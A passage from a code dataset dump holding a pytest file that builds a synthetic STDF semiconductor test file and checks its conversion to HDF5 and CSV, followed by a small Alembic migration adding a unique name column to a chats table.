\nwriter_uva.save()","sub_path":"data_scrape.py","file_name":"data_scrape.py","file_ext":"py","file_size_in_byte":2504,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"521799957","text":"# -*- coding: utf-8 -*-\nimport time\nimport h5py\nimport os\nimport os.path\n\nimport sys\nsys.path.insert(0, os.path.abspath(os.path.join(os.path.dirname(__file__), '..')))\n\n\nimport Semi_ATE.STDF.FAR as FAR\nimport Semi_ATE.STDF.ATR as ATR\nimport Semi_ATE.STDF.WIR as WIR\nimport Semi_ATE.STDF.MIR as MIR\nimport Semi_ATE.STDF.PCR as PCR\nimport Semi_ATE.STDF.MRR as MRR\nimport Semi_ATE.STDF.WRR as WRR\n\nfrom Metis.tools.stdf2ph5 import SHP\nfrom Metis.tools.stdf2csv import SCC\n\n\n# Tests are not finished yet. Only basic tests were written, not real ones.\n\ndef test_SHP():\n \n make_stdf()\n \n shp = SHP()\n stdf_file = str('test.stdf')\n out_folder = str('test_result')\n shp.import_stdf_into_hdf5(stdf_file, out_folder)\n\n hdf5_file = os.path.join(out_folder, '12345.h5')\n\n f = h5py.File(hdf5_file,'r')\n\n assert f['backup'] != None\n assert f['raw_stdf_data'] != None\n \n backup_group = f['backup']\n file = backup_group.get(stdf_file)\n assert file != None\n\n raw_group = f['raw_stdf_data']\n raw_file = raw_group.get(stdf_file)\n assert raw_file != None\n atr = raw_file.get('ATR')\n assert atr != None\n far = raw_file.get('FAR')\n assert far != None\n mir = raw_file.get('MIR')\n assert mir != None\n mrr = raw_file.get('MRR')\n assert mrr != None\n pcr = raw_file.get('PCR')\n assert pcr != None\n \n f.close()\n \n \ndef test_SCC():\n\n make_stdf()\n\n scc = SCC()\n stdf_file = str('test.stdf')\n out_folder = str('test_result')\n scc.convert(stdf_file, out_folder, disable_progress = True)\n \n csv_files = ['ATR.csv', 'FAR.csv', 'MIR.csv', 'MRR.csv', 'PCR.csv']\n \n for csv_file in csv_files:\n file = os.path.join(out_folder, csv_file)\n assert os.path.getsize(file) > 0\n\n\ndef make_stdf():\n \n with open('test.stdf', 'wb') as f:\n\n far = FAR()\n \n f.write(far.__repr__())\n \n atr = ATR() \n atr.set_value('MOD_TIM', 1609462861)\n cmd_line = \"modification_script.sh -src /data/stdf/2020-01-01\"\n atr.set_value('CMD_LINE', cmd_line)\n f.write(atr.__repr__())\n \n wir = WIR()\n wir.set_value('HEAD_NUM', 1)\n wir.set_value('SITE_GRP', 1)\n wir.set_value('START_T', int(time.time()))\n wir.set_value('WAFER_ID', \"WFR_NAS9999\")\n f.write(wir.__repr__())\n \n \n mir = MIR()\n mir.set_value('SETUP_T', 1609462861)\n mir.set_value('START_T', 1609462961)\n mir.set_value('STAT_NUM', 131)\n mir.set_value('MODE_COD', 'P')\n mir.set_value('RTST_COD', ' ')\n mir.set_value('PROT_COD', ' ')\n mir.set_value('BURN_TIM', 65535)\n mir.set_value('CMOD_COD', ' ')\n mir.set_value('LOT_ID', '12345')\n mir.set_value('PART_TYP', 'HAL3715')\n mir.set_value('NODE_NAM', 'Node123')\n mir.set_value('TSTR_TYP', 'SCT')\n mir.set_value('JOB_NAM', 'TPHAL3715_HCT')\n mir.set_value('JOB_REV', '4HEX2GIT')\n mir.set_value('SBLOT_ID', 'NAS9999-1')\n mir.set_value('OPER_NAM','op123')\n mir.set_value('EXEC_TYP', 'SCTSW') \n mir.set_value('EXEC_VER', 'GIT4HEXREV') \n mir.set_value('TEST_COD', 'PROBING')\n mir.set_value('TST_TEMP', '25C') \n mir.set_value('USER_TXT', '') \n mir.set_value('AUX_FILE', '') \n mir.set_value('PKG_TYP', 'SOIC8') \n mir.set_value('FAMLY_ID', 'HAL') \n mir.set_value('DATE_COD', '1220') \n mir.set_value('FACIL_ID', 'FR1') \n mir.set_value('FLOOR_ID', 'PR1')\n mir.set_value('PROC_ID', 'FIN135nm')\n mir.set_value('OPER_FRQ', '1')\n mir.set_value('SPEC_NAM', 'PR35')\n mir.set_value('SPEC_VER', '1.1')\n mir.set_value('FLOW_ID', 'STD')\n mir.set_value('SETUP_ID', 'LB1111')\n mir.set_value('DSGN_REV', 'AB12CH')\n mir.set_value('ENG_ID', '') \n mir.set_value('ROM_COD', 'RC12345')\n mir.set_value('SERL_NUM', '1221001')\n mir.set_value('SUPR_NAM', '')\n f.write(mir.__repr__())\n \n pcr = PCR()\n pcr.set_value('HEAD_NUM', 1)\n pcr.set_value('SITE_NUM', 1)\n pcr.set_value('PART_CNT', 4294967295)\n pcr.set_value('RTST_CNT', 123)\n pcr.set_value('ABRT_CNT', 0)\n pcr.set_value('GOOD_CNT', 4294967172)\n pcr.set_value('FUNC_CNT', 0)\n f.write(pcr.__repr__())\n \n mrr = MRR()\n mrr.set_value('FINISH_T', 1609462861)\n mrr.set_value('DISP_COD', 'Z') \n mrr.set_value('USR_DESC', 'NAS12345')\n mrr.set_value('EXC_DESC', '12345')\n f.write(mrr.__repr__()) \n \n wrr = WRR()\n wrr.set_value('HEAD_NUM', 1)\n wrr.set_value('SITE_GRP', 1)\n wrr.set_value('FINISH_T', 1609462861)\n wrr.set_value('PART_CNT', 11234567)\n wrr.set_value('RTST_CNT', 123)\n wrr.set_value('ABRT_CNT', 0)\n wrr.set_value('GOOD_CNT', 11234444)\n wrr.set_value('FUNC_CNT', 0)\n wrr.set_value('WAFER_ID', 'WFR_NAS9999')\n wrr.set_value('FABWF_ID', 'FABWFR_FR')\n wrr.set_value('FRAME_ID', 'FRAME_213141')\n wrr.set_value('MASK_ID', 'MASK_131212')\n wrr.set_value('USR_DESC', 'USR_DESC')\n wrr.set_value('EXC_DESC', 'DESC_NOTHING')\n f.write(wrr.__repr__()) \n","sub_path":"tests/test_stdf_convert.py","file_name":"test_stdf_convert.py","file_ext":"py","file_size_in_byte":5327,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"} +{"seq_id":"241526010","text":"\"\"\"empty message\n\nRevision ID: bb93e9c2dc54\nRevises: 47a29340e82f\nCreate Date: 2016-05-26 23:35:07.793708\n\n\"\"\"\n\n# revision identifiers, used by Alembic.\nrevision = 'bb93e9c2dc54'\ndown_revision = '47a29340e82f'\n\nfrom alembic import op\nimport sqlalchemy as sa\n\n\ndef upgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.add_column('chats', sa.Column('name', sa.String(length=128), nullable=True))\n op.create_unique_constraint(None, 'chats', ['name'])\n ### end Alembic commands ###\n\n\ndef downgrade():\n ### commands auto generated by Alembic - please adjust! ###\n op.drop_constraint(None, 'chats', type_='unique')\n op.drop_column('chats', 'name')\n ### end Alembic commands ###\n","sub_path":"migrations/versions/bb93e9c2dc54_.py","file_name":"bb93e9c2dc54_.py","file_ext":"py","file_size_in_byte":719,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"10"}